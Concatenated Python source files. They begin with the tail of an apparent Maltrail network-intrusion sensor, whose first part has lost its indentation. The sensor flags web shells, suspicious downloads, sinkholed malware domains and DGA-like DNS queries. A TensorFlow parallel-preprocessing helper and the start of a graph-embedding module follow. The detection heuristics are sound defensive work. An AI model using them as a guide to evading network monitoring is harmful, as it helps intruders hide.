_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs (Note: alternative is to check whitelist)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if "%s:%s" % (dst_ip, dst_port) in trails:
trail = "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
    """
    Performs sensor initialization (trail updates, capture interfaces,
    plugins, multiprocessing and CPU affinity setup)
    """

    global _multiprocessing

    # Use multiprocessing only when more than one process is configured
    # and profiling is off (the profiler can't follow child processes)
    try:
        import multiprocessing

        if config.PROCESS_COUNT > 1 and not config.profile:
            _multiprocessing = multiprocessing
    except (ImportError, OSError, NotImplementedError):
        pass

    def update_timer():
        # Periodically (re)loads trails, then re-arms itself via threading.Timer
        retries = 0
        if not config.no_updates:
            while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
                sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
                sys.stdout.flush()
                time.sleep(10)
                retries += 1

            if retries:
                print(")")

        if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
            if retries == CHECK_CONNECTION_MAX_RETRIES:
                print("[x] going to continue without online update")
            _ = update_trails(offline=True)
        else:
            _ = update_trails()
            update_ipcat()

        if _:
            trails.clear()
            trails.update(_)
        elif not trails:
            _ = load_trails()
            trails.update(_)

        # Build one alternation regex out of all "static" regex-like trails,
        # capped at 100 named groups
        # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
        _regex = ""
        for trail in trails:
            if "static" in trails[trail][1]:
                if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
                    try:
                        re.compile(trail)
                    except:
                        pass
                    else:
                        if re.escape(trail) != trail:
                            index = _regex.count("(?P<g")
                            if index < 100:
                                _regex += "|(?P<g%s>%s)" % (index, trail)

        trails._regex = _regex.strip('|')

        thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
        thread.daemon = True
        thread.start()

    create_log_directory()
    get_error_log_handle()

    check_memory()

    msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
    if os.path.isfile(config.TRAILS_FILE):
        mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
        msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)

    print(msg)

    update_timer()

    if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
        exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)

    if config.plugins:
        config.plugin_functions = []

        for plugin in re.split(r"[,;]", config.plugins):
            plugin = plugin.strip()
            found = False

            for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
                if os.path.isfile(_):
                    plugin = _
                    found = True
                    break

            if not found:
                exit("[!] plugin script '%s' not found" % plugin)
            else:
                dirname, filename = os.path.split(plugin)
                dirname = os.path.abspath(dirname)
                if not os.path.exists(os.path.join(dirname, '__init__.py')):
                    exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)

                if not filename.endswith(".py"):
                    exit("[!] plugin script '%s' should have an extension '.py'" % filename)

                if dirname not in sys.path:
                    sys.path.insert(0, dirname)

                try:
                    # Fix: __import__() requires a (unicode) str on Python 3;
                    # encoding to bytes is only valid (and needed) on Python 2
                    module = __import__(filename[:-3] if six.PY3 else filename[:-3].encode(sys.getfilesystemencoding()))
                except (ImportError, SyntaxError) as msg:
                    exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))

                found = False

                # Fix: the original check used mismatched quotes
                # (set(("event_tuple', 'packet")) - a set of single characters),
                # turning the signature check into a no-op. The plugin entry
                # point must accept both 'event_tuple' and 'packet' arguments.
                # (inspect.getargspec was removed in Python 3.11)
                _getargspec = inspect.getfullargspec if hasattr(inspect, "getfullargspec") else inspect.getargspec

                for name, function in inspect.getmembers(module, inspect.isfunction):
                    if name == "plugin" and not set(("event_tuple", "packet")) - set(_getargspec(function).args):
                        found = True
                        config.plugin_functions.append(function)
                        function.__name__ = module.__name__

                if not found:
                    exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)

    if config.pcap_file:
        for _ in config.pcap_file.split(','):
            _caps.append(pcapy.open_offline(_))
    else:
        interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))

        if (config.MONITOR_INTERFACE or "").lower() == "any":
            if IS_WIN or "any" not in pcapy.findalldevs():
                print("[x] virtual interface 'any' missing. Replacing it with all interface names")
                interfaces = pcapy.findalldevs()
            else:
                print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")

        for interface in interfaces:
            if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
                hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
                exit("[!] interface '%s' not found\n%s" % (interface, hint))

            print("[i] opening interface '%s'" % interface)
            try:
                _caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
            except (socket.error, pcapy.PcapError):
                if "permitted" in str(sys.exc_info()[1]):
                    exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
                elif "No such device" in str(sys.exc_info()[1]):
                    exit("[!] no such device '%s'" % interface)
                else:
                    raise

    if config.LOG_SERVER and ':' not in config.LOG_SERVER:
        exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)

    if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
        exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)

    if config.CAPTURE_FILTER:
        print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
        for _cap in _caps:
            try:
                _cap.setfilter(config.CAPTURE_FILTER)
            except:
                pass

    if _multiprocessing:
        _init_multiprocessing()

    if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
        # Best-effort CPU affinity setup via 'schedtool' (all errors ignored)
        try:
            try:
                mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
                # Fix: check_output() returns bytes on Python 3 - decode before splitting
                used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).decode("utf8", "replace").strip().split('\n')
                max_used = max(int(_, 16) for _ in used)
                affinity = max(1, (max_used << 1) % 2 ** mod)
            except:
                affinity = 1
            p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            _, stderr = p.communicate()
            # Fix: communicate() yields bytes on Python 3 (no text mode requested)
            if b"not found" in stderr:
                msg = "[?] please install 'schedtool' for better CPU scheduling"
                # Note: platform.linux_distribution() was removed in Python 3.8;
                # fall back to the generic message in that case
                _ = getattr(platform, "linux_distribution", lambda: ("",))()[0].lower()
                for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
                    if _ in distro:
                        msg += " (e.g. '%s')" % install
                        break
                print(msg)
        except:
            pass
def _init_multiprocessing():
    """
    Inits worker processes used in multiprocessing mode
    """

    global _buffer
    global _n

    if not _multiprocessing:
        return

    print("[i] preparing capture buffer...")

    try:
        # Anonymous shared memory map used as capture buffer for raw packets
        # Reference: http://www.alexonlinux.com/direct-io-in-python
        _buffer = mmap.mmap(-1, config.CAPTURE_BUFFER)

        # Zero-fill the whole buffer chunk by chunk, then rewind
        zero_chunk = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
        for _ in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
            _buffer.write(zero_chunk)
        _buffer.seek(0)
    except KeyboardInterrupt:
        raise
    except:
        exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")

    print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))

    # Shared (unlocked) counter of written blocks; writer is the main process
    _n = _multiprocessing.Value('L', lock=False)

    for worker_index in xrange(config.PROCESS_COUNT - 1):
        worker_process = _multiprocessing.Process(target=worker, name=str(worker_index), args=(_buffer, _n, worker_index, config.PROCESS_COUNT - 1, _process_packet))
        worker_process.daemon = True
        worker_process.start()
def monitor():
    """
    Sniffs/monitors given capturing interface
    """

    print("[o] running...")

    def packet_handler(datalink, header, packet):
        # Per-packet callback: locates the IP payload inside the link-layer
        # frame and hands it over for processing - either directly or through
        # the shared multiprocessing capture buffer
        global _count

        ip_offset = None

        try:
            # NOTE(review): DLT_OFFSETS is defined elsewhere in this file -
            # presumably maps pcap datalink types to link-layer header lengths
            dlt_offset = DLT_OFFSETS[datalink]
        except KeyError:
            log_error("Received unexpected datalink (%d)" % datalink, single=True)
            return

        try:
            if datalink == pcapy.DLT_RAW:
                ip_offset = dlt_offset
            elif datalink == pcapy.DLT_PPP:
                if packet[2:4] in (b"\x00\x21", b"\x00\x57"):  # (IPv4, IPv6)
                    ip_offset = dlt_offset
            elif datalink == pcapy.DLT_NULL:
                if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"):  # (IPv4, IPv6)
                    ip_offset = dlt_offset
            elif dlt_offset >= 2:
                if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00":  # VLAN (802.1Q) tag - skip its 4 extra bytes
                    dlt_offset += 4

                if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"):  # EtherType (IPv4, IPv6)
                    ip_offset = dlt_offset
        except IndexError:
            pass

        if ip_offset is None:
            # Not an IP packet (or unrecognized framing) - ignore
            return

        try:
            if six.PY3:  # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
                sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
            else:
                sec, usec = header.getts()

            if _multiprocessing:
                # Serialize timestamp + offset header followed by the raw
                # packet, and append it to the shared capture buffer
                block = struct.pack("=III", sec, usec, ip_offset) + packet

                if _locks.count:
                    _locks.count.acquire()

                write_block(_buffer, _count, block)
                _n.value = _count = _count + 1

                if _locks.count:
                    _locks.count.release()
            else:
                _process_packet(packet, sec, usec, ip_offset)
        except socket.timeout:
            pass

    try:
        def _(_cap):
            # Capture loop for a single pcapy handle (one thread per handle)
            global _done_count

            datalink = _cap.datalink()

            if six.PY3:  # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
                def _loop_handler(header, packet):
                    packet_handler(datalink, header, packet)

                _cap.loop(-1, _loop_handler)
            else:
                while True:
                    success = False
                    try:
                        (header, packet) = _cap.next()
                        if header is not None:
                            success = True
                            packet_handler(datalink, header, packet)
                        elif config.pcap_file:
                            # End of offline pcap file reached
                            with _done_lock:
                                _done_count += 1
                            break
                    except (pcapy.PcapError, socket.timeout):
                        pass

                    if not success:
                        time.sleep(REGULAR_SENSOR_SLEEP_TIME)

        if config.profile and len(_caps) == 1:
            print("[=] will store profiling results to '%s'..." % config.profile)
            _(_caps[0])
        else:
            if len(_caps) > 1:
                if _multiprocessing:
                    _locks.count = threading.Lock()
                _locks.connect_sec = threading.Lock()

            for _cap in _caps:
                threading.Thread(target=_, args=(_cap,)).start()

            # Block until all offline pcap files are fully consumed
            # (for live capture this effectively waits forever)
            while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
                time.sleep(1)

            print("[i] all capturing interfaces closed")
    except SystemError as ex:
        if "error return without" in str(ex):
            print("\r[x] stopping (Ctrl-C pressed)")
        else:
            raise
    except KeyboardInterrupt:
        print("\r[x] stopping (Ctrl-C pressed)")
    finally:
        print("\r[i] please wait...")
        if _multiprocessing:
            try:
                # Push one end-marker per worker so they all terminate
                for _ in xrange(config.PROCESS_COUNT - 1):
                    write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
                    _n.value = _n.value + 1
                while _multiprocessing.active_children():
                    time.sleep(REGULAR_SENSOR_SLEEP_TIME)
            except KeyboardInterrupt:
                pass
def main():
    """
    Parses command line options, reads configuration and starts monitoring
    """

    # Pre-process sys.argv: "-q" silences stdout; multiple pcap files listed
    # after "-i" are merged into a single comma-separated option value
    for i in xrange(1, len(sys.argv)):
        if sys.argv[i] == "-q":
            sys.stdout = open(os.devnull, 'w')
        if sys.argv[i] == "-i":
            for j in xrange(i + 2, len(sys.argv)):
                value = sys.argv[j]
                if os.path.isfile(value):
                    sys.argv[i + 1] += ",%s" % value
                    sys.argv[j] = ''
                else:
                    break

    print("%s (sensor) #v%s\n" % (NAME, VERSION))

    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
    parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
    parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
    parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
    parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
    parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
    parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
    parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
    options, _ = parser.parse_args()

    read_config(options.config_file)

    # Mirror string/boolean command line options into the global config
    for option in dir(options):
        if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
            config[option] = getattr(options, option)

    if options.debug:
        config.console = True
        config.PROCESS_COUNT = 1
        config.SHOW_DEBUG = True

    if options.pcap_file:
        if options.pcap_file == '-':
            print("[i] using STDIN")
        else:
            for _ in options.pcap_file.split(','):
                if not os.path.isfile(_):
                    exit("[!] missing pcap file '%s'" % _)

            print("[i] using pcap file(s) '%s'" % options.pcap_file)

    if not config.DISABLE_CHECK_SUDO and not check_sudo():
        exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)

    try:
        init()
        if config.profile:
            # Truncate/create the profiling output file up front.
            # Fix: the file is opened in binary mode, so an empty *bytes*
            # payload must be written - writing "" raises TypeError on
            # Python 3; also close the handle via context manager
            with open(config.profile, "w+b") as f:
                f.write(b"")
            cProfile.run("monitor()", config.profile)
        else:
            monitor()
    except KeyboardInterrupt:
        print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
    # Top-level entry guard: runs main() and translates every exit path into
    # a process exit code, logging unexpected failures
    show_final = True

    try:
        main()
    except SystemExit as ex:
        # exit() calls above carry a human-readable message - print it and
        # terminate with a non-zero code
        show_final = False

        if isinstance(get_ex_message(ex), six.string_types):
            print(get_ex_message(ex))

        os._exit(1)
    except IOError:
        # e.g. broken stdout pipe
        show_final = False
        log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
    except Exception:
        msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
        msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
        log_error("\n\n%s" % msg.replace("\r", ""))

        print(msg)
    finally:
        if show_final:
            print("[i] finished")

        # os._exit() skips interpreter cleanup (daemon threads/processes may
        # otherwise prevent a normal shutdown)
        os._exit(0)
|
parallel_preproc.py | import atexit
import itertools
from options import logger
import os
import queue
import threading
import more_itertools
import numpy as np
import tensorflow as tf
import my_itertools
import tfu
import util
def parallel_map_as_tf_dataset(
        fun, iterable, *, shuffle_before_each_epoch=False,
        extra_args=None, n_workers=10, rng=None, max_unconsumed=256, n_completed_items=0,
        n_total_items=None, roundrobin_sizes=None):
    """Maps `fun` to each element of `iterable` and wraps the resulting sequence
    as a TensorFlow Dataset. Elements are processed by parallel workers.

    Args:
        fun: A function that takes an element from `iterable` plus `extra_args`
            (and an `rng` keyword argument) and returns a sequence of numpy arrays.
        iterable: An iterable holding the inputs (or, when `roundrobin_sizes` is
            given, a list of iterables to be interleaved).
        shuffle_before_each_epoch: Shuffle the input elements before each epoch.
            Converts `iterable` to a list internally.
        extra_args: extra arguments in addition to an element from `iterable`,
            given to `fun` at each call
        n_workers: Number of worker processes for parallelism; 0 processes items
            inline, None picks min(available CPUs, 12).
        rng: Base random number generator used to derive per-item RNGs.
        max_unconsumed: Upper bound on scheduled-but-unconsumed work items.
        n_completed_items: Number of items already consumed (checkpoint restore);
            the input stream and the RNG are advanced accordingly.
        n_total_items: Total number of items to emit (None means unbounded).
        roundrobin_sizes: If given, interleave the input iterables round-robin
            with these batch sizes (see my_itertools.roundrobin_iterate_repeatedly).

    Returns:
        tf.data.Dataset based on the arrays returned by `fun`.
    """

    extra_args = extra_args or []

    # Automatically determine the output tensor types and shapes by calling the function on
    # the first element
    if not roundrobin_sizes:
        iterable = more_itertools.peekable(iterable)
        first_elem = iterable.peek()
    else:
        iterable[0] = more_itertools.peekable(iterable[0])
        first_elem = iterable[0].peek()
    sample_output = fun(first_elem, *extra_args, rng=np.random.RandomState(0))
    output_signature = tf.nest.map_structure(tf.type_spec_from_value, sample_output)

    if not roundrobin_sizes:
        items = my_itertools.iterate_repeatedly(
            iterable, shuffle_before_each_epoch, util.new_rng(rng))
    else:
        items = my_itertools.roundrobin_iterate_repeatedly(
            iterable, roundrobin_sizes, shuffle_before_each_epoch, rng)

    # If we are restoring from a checkpoint and have already completed some
    # training steps for that checkpoint, then we need to advance the RNG
    # accordingly, to continue exactly where we left off.
    iter_rng = util.new_rng(rng)
    util.advance_rng(iter_rng, n_completed_items)
    items = itertools.islice(items, n_completed_items, n_total_items)

    if n_workers is None:
        n_workers = min(len(os.sched_getaffinity(0)), 12)
    if n_workers == 0:
        # Sequential fallback: process items inline in the generator
        # NOTE(review): the rng is passed positionally here but by keyword in
        # the probe call above - assumes `fun` accepts it either way; verify
        def gen():
            for item in items:
                yield fun(item, *extra_args, util.new_rng(iter_rng))
    else:
        gen = parallel_map_as_generator(
            fun, items, extra_args, n_workers, rng=iter_rng, max_unconsumed=max_unconsumed)

    ds = tf.data.Dataset.from_generator(gen, output_signature=output_signature)
    # Make the cardinality of the dataset known to TF.
    if n_total_items is not None:
        ds = ds.take(n_total_items - n_completed_items)
    return ds
def parallel_map_as_generator(fun, items, extra_args, n_workers, max_unconsumed=256, rng=None):
    """Schedules `fun(item, *extra_args, rng)` on a worker pool for every item
    and returns a generator *function* that yields the results in order.

    A background producer thread keeps at most `max_unconsumed` results
    scheduled-but-unconsumed (bounded by a semaphore) so the pool cannot run
    arbitrarily far ahead of the consumer.
    """
    semaphore = threading.Semaphore(max_unconsumed)
    q = queue.Queue()
    end_of_sequence_marker = object()  # sentinel; identity-compared in consumer
    should_stop = False
    pool = tfu.get_pool(n_workers)

    def producer():
        # Runs on a daemon thread: submit work to the pool, pushing the
        # AsyncResult futures into the queue in input order
        for i_item, item in enumerate(items):
            if should_stop:
                break
            semaphore.acquire()  # released by consumer once the result is taken
            q.put(pool.apply_async(fun, (item, *extra_args, util.new_rng(rng))))

        logger.debug('Putting end-of-seq')
        q.put(end_of_sequence_marker)

    def consumer():
        # Generator yielding completed results in submission order
        while (future :=q.get()) is not end_of_sequence_marker:
            value = future.get()
            semaphore.release()
            yield value

    def stop():
        # atexit hook: signal the producer to stop and tear down the pool
        # NOTE(review): `should_stop` is read without a lock - relies on the
        # GIL making a plain boolean flag flip visible to the producer thread
        nonlocal should_stop
        should_stop = True
        pool.close()
        pool.terminate()

    producer_thread = threading.Thread(target=producer, daemon=True)
    producer_thread.start()
    atexit.register(stop)

    return consumer
|
tensor_models.py | """
KG Sparse embedding
"""
import os
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as functional
import torch.nn.init as INIT
import torch.multiprocessing as mp
from torch.multiprocessing import Queue
from _thread import start_new_thread
import traceback
from functools import wraps
from .. import *
# Short alias kept for existing call sites.
logsigmoid = functional.logsigmoid


def get_device(args):
    """Return the torch.device to use: CPU when the first configured GPU id
    is negative, otherwise that CUDA device.

    Parameters
    ----------
    args :
        Global config object; only ``args.gpu`` (a sequence of ints) is read.
    """
    return th.device('cpu') if args.gpu[0] < 0 else th.device('cuda:' + str(args.gpu[0]))


# Note: the following helpers were originally lambdas bound to names
# (PEP 8 E731); plain functions are equivalent and self-documenting.

def norm(x, p):
    """Return ``||x||_p ** p`` (the p-th power of the p-norm of `x`)."""
    return x.norm(p=p) ** p


def get_scalar(x):
    """Extract a Python scalar from a 0-dim tensor, detached from autograd."""
    return x.detach().item()


def reshape(arr, x, y):
    """View `arr` as an ``(x, y)`` tensor without copying."""
    return arr.view(x, y)


def cuda(arr, gpu):
    """Move `arr` to the CUDA device with index `gpu`."""
    return arr.cuda(gpu)
def thread_wrapped_func(func):
    """Wrapped func for torch.multiprocessing.Process.

    With this wrapper we can use OMP threads in subprocesses
